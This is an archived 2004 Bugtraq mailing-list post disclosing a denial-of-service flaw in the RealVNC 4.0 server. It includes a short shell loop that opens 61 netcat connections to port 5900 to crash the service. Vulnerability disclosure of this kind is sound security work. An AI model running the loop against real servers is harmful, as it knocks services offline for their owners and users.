RealVNC 4.0 DoS
From: Allan Zhang (zhangliangsd_at_hotmail.com)
Date: 08/25/04
- Previous message: Cisco Systems Product Security Incident Response Team: "Cisco Security Advisory: Multiple Vulnerabilities in Cisco Secure Access Control Server"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 25 Aug 2004 17:11:59 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
It will cause RealVNC server die if there are more than 60 connections.
Tested against RealVNC serveron W2k using the following script:
for i in `seq 1 61`
do
nc <server_ip> 5900
done
This will impact version before 4.0 also.
Thanks
Allan